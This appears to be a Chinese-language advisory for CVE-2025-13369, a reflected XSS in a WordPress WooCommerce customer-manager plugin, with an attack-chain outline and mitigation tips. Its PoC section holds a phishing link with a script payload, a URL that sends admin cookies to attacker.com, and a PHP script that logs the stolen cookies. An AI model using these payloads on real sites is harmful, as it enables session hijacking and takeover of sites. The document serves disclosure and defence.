CVE-2025-13369 CVSS 6.1 中危

CVE-2025-13369 WordPress Premmerce WooCommerce Customers Manager反射型XSS漏洞

披露日期: 2026-01-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13369

漏洞类型

反射型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premmerce WooCommerce Customers Manager WordPress插件

漏洞概述

CVE-2025-13369是WordPress插件Premmerce WooCommerce Customers Manager中的一个中等严重性安全漏洞。该漏洞为反射型跨站脚本(XSS)问题，存在于插件的所有版本中（截至1.1.14版本）。攻击者可以通过特定参数注入恶意JavaScript代码，当管理员点击特制的链接时，注入的脚本将在管理员浏览器中执行。由于管理员账户通常具有较高权限，成功利用此漏洞可能导致会话劫持、管理后台敏感数据泄露，甚至进一步控制整个WordPress网站。此漏洞的CVSS评分为6.1，属于中危级别，主要因为其需要用户交互才能成功利用，且攻击复杂度较低。

技术细节

该漏洞的根本原因在于插件对用户输入的参数缺乏充分的输入验证和输出转义。具体受影响参数包括：money_spent_from、money_spent_to、registered_from和registered_to，这些参数用于客户管理功能中的过滤和日期范围筛选。在Admin.php文件的第135行和相关视图文件filter.php的第43行，插件直接使用这些参数值而未进行适当的HTML转义处理。攻击者可以构造包含恶意JavaScript代码的URL参数，当管理员访问该URL时，恶意脚本会被反射回用户浏览器并执行。由于WordPress管理后台的功能丰富，攻击者可在管理员会话中执行任意JavaScript操作，包括窃取cookies、伪造管理操作、修改网站内容等。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Premmerce WooCommerce Customers Manager插件版本，确认版本≤1.1.14

STEP 2

步骤2: 构造恶意链接

攻击者构造包含XSS payload的恶意URL，利用money_spent_from、money_spent_to、registered_from或registered_to参数注入JavaScript代码

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱骗WordPress管理员点击恶意链接

STEP 4

步骤4: XSS执行

管理员点击链接后，恶意JavaScript代码在管理员浏览器中执行，可窃取会话cookie或执行管理员操作

STEP 5

步骤5: 会话劫持/权限提升

攻击者利用窃取的会话或执行的操作，进一步控制WordPress网站，安装恶意插件或修改内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13369 Reflected XSS PoC -->
<!-- 诱骗管理员访问以下恶意URL -->

<a href="http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>alert(document.cookie)</script>">点击查看促销信息</a>

<!-- 或直接构造的URL -->
<!-- http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- 攻击者服务器端接收脚本 (steal.php) -->
<?php
if(isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $log = fopen('cookies.log', 'a');
    fwrite($log, $cookie . "\n");
    fclose($log);
    // 可选：重定向回原网站以减少怀疑
    header('Location: http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers');
}
?>

影响范围

Premmerce WooCommerce Customers Manager ≤ 1.1.14

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 限制管理员账户对可疑链接的访问权限；2) 使用Web应用防火墙(WAF)规则过滤包含<script>标签或javascript:协议的URL参数；3) 提醒管理员不要点击来源不明的链接；4) 考虑暂时禁用或替换该插件，待官方发布安全更新后再重新启用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表